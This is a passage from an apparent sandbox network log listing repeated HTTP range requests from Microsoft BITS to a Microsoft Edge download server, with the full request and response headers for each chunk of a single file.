                Date: Tue, 11 Feb 2025 16:50:45 GMT
                Content-Type: application/octet-stream
                Content-Length: 3874416
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9605f2-2915334016-89
                Ocn-Served-By: QLT
                Content-Range: bytes 65363514-69237929/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=69237930-70963533
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:00 GMT
                Content-Type: application/octet-stream
                Content-Length: 1725604
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9808ae-2915334016-90
                Ocn-Served-By: QLT
                Content-Range: bytes 69237930-70963533/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=70963534-72753069
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:02 GMT
                Content-Type: application/octet-stream
                Content-Length: 1789536
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c983dc7-2915334016-91
                Ocn-Served-By: QLT
                Content-Range: bytes 70963534-72753069/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=72753070-74359509
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:03 GMT
                Content-Type: application/octet-stream
                Content-Length: 1606440
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c986b4c-2915334016-92
                Ocn-Served-By: QLT
                Content-Range: bytes 72753070-74359509/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=74359510-75832947
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:04 GMT
                Content-Type: application/octet-stream
                Content-Length: 1473438
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c9883af-2915334016-93
                Ocn-Served-By: QLT
                Content-Range: bytes 74359510-75832947/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=75832948-77185524
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:05 GMT
                Content-Type: application/octet-stream
                Content-Length: 1352577
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c98a0dc-2915334016-94
                Ocn-Served-By: QLT
                Content-Range: bytes 75832948-77185524/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=77185525-78451356
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:06 GMT
                Content-Type: application/octet-stream
                Content-Length: 1265832
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c98be8f-2915334016-95
                Ocn-Served-By: QLT
                Content-Range: bytes 77185525-78451356/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=78451357-79697442
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:07 GMT
                Content-Type: application/octet-stream
                Content-Length: 1246086
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c98dc56-2915334016-96
                Ocn-Served-By: QLT
                Content-Range: bytes 78451357-79697442/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=79697443-80944448
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:08 GMT
                Content-Type: application/octet-stream
                Content-Length: 1247006
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c98f8c7-2915334016-97
                Ocn-Served-By: QLT
                Content-Range: bytes 79697443-80944448/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=80944449-82708122
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:11 GMT
                Content-Type: application/octet-stream
                Content-Length: 1763674
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c99307e-2915334016-98
                Ocn-Served-By: QLT
                Content-Range: bytes 80944449-82708122/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=82708123-85801507
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:12 GMT
                Content-Type: application/octet-stream
                Content-Length: 3093385
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c994b77-2915334016-99
                Ocn-Served-By: QLT
                Content-Range: bytes 82708123-85801507/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=85801508-89271550
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:13 GMT
                Content-Type: application/octet-stream
                Content-Length: 3470043
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c997a79-2915334016-100
                Ocn-Served-By: QLT
                Content-Range: bytes 85801508-89271550/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=89271551-92681036
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:14 GMT
                Content-Type: application/octet-stream
                Content-Length: 3409486
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c998941-2915334016-101
                Ocn-Served-By: QLT
                Content-Range: bytes 89271551-92681036/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=92681037-97030436
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:51:15 GMT
                Content-Type: application/octet-stream
                Content-Length: 4349400
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c99a6bc-2915334016-102
                Ocn-Served-By: QLT
